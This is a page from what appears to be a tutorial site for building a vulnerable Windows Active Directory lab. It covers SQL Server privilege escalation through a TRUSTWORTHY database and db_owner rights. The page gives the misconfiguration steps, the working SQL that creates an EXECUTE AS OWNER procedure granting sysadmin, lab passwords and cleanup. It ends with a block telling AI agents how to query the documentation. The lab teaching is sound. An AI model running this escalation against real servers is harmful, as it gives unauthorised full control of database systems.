# DB-Owner ## Configuring ### Prerequisite {% content-ref url="/pages/qB32tCgObrEYZKLqTafy" %} [Normal domain user access](/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/sql-server-attacks/initial-access/normal-domain-user-access.md) {% endcontent-ref %} ### Configuring 1. Login to `WEB01` as the `Administrator` user with password `Welcome01!`. 2. Open "Microsoft SQL Server Management Studio"

3\. Login with the `sa` user using the password `sa` or `Password1!` (Depending if you changed it for another vulnerability)

4\. Click “New Query” button and use the SQL query below to make `Amsterdam\Richard` database owner of the `production` database.

``` Use Production; EXEC sp_addrolemember [db_owner], [AMSTERDAM\Richard]; ``` 5\. Change the Owner of the database to the SA account. Right click on "Production", click "Properties" and open the "Files" tab. Click on the "..." and fill in "sa" and click on "OK"

6\. Execute the following query to make sure `Amsterdam\Richard` is Database owner and the real Owner of the database is `sa`: ``` select rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id) SELECT suser_sname(owner_sid) FROM sys.databases WHERE name = 'Production' ```

7\. Set the database as trustworthy and check if it is: ``` ALTER DATABASE MyAppDb SET TRUSTWORTHY ON ```

``` SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name; ```

The `1` after `Production` shows us that the database is `ThrustWorthy`. ## Attacking ### How it works If the database is set as trustworthy and we have db\_owner privileges, we could elevate our privileges and execute queries as sa. ### Tools * [HeidiSql](https://www.heidisql.com/) ### Executing attack 1. Login to `WS01` as Richard with the password `Sample123`. 2. Download and start heidiSQL. 3. Click on "New" on the left bottom and configure the following settings: * Network Type: `Microsoft SQL Server (TCP/IP)` * Library: `SQLOLEDB` * Hostname / IP: `WEB01.amsterdam.bank.local` * Select: "Use Windows Authentication" * Port: `1433` ![](/files/nlD2RN0mEAhgqDmwWGBQ) 4\. Click "OK" on the security Issue warning. #### Prerequisites 5\. Click on the "Query" tab and enter the following Query to check if we are `db_owner`: ``` select rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id) ```

Our current user `AMSTERDAM\richard` is db\_owner. 6\. Check who is the owner of the database. ``` SELECT suser_sname(owner_sid), * FROM sys.databases ```

`sa` is the owner of the `production` database. 6\. Check if the database is set to trustworthy ``` SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name; ```

The Production database is trustworty. #### Executing the attack 7\. Create a stored procedure which will add `AMSTERDAM\Richard` as sysadmin. ``` USE Production; CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'AMSTERDAM\Richard','sysadmin' ``` ![](/files/n1Eys7z3ais9L29CCsEl) 8\. Execute the stored procedure: ``` USE Production; EXEC sp_elevate_me ```

9\. Check if we are sysadmin: ``` SELECT is_srvrolemember('sysadmin') ```

The `1` means that we are sysadmin! Check the executing commands page under SQL Server Attacks to read how to execute cmd commands: {% content-ref url="/pages/8Jb6EIbewuWtB6niRRoj" %} [Executing Commands](/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/sql-server-attacks/executing-commands.md) {% endcontent-ref %} #### Cleanup 1. Login to WEB01 as Administrator, start the "Microsoft SQL Server Management Studio" and login as Administrator. 2. Execute the following query: ``` EXEC sp_dropsrvrolemember 'AMSTERDAM\Richard','sysadmin'; DROP PROCEDURE sp_elevate_me; ``` ## Defending ### Recommendations ### Detection ## References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/sql-server-attacks/privilege-escalation/db-owner.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.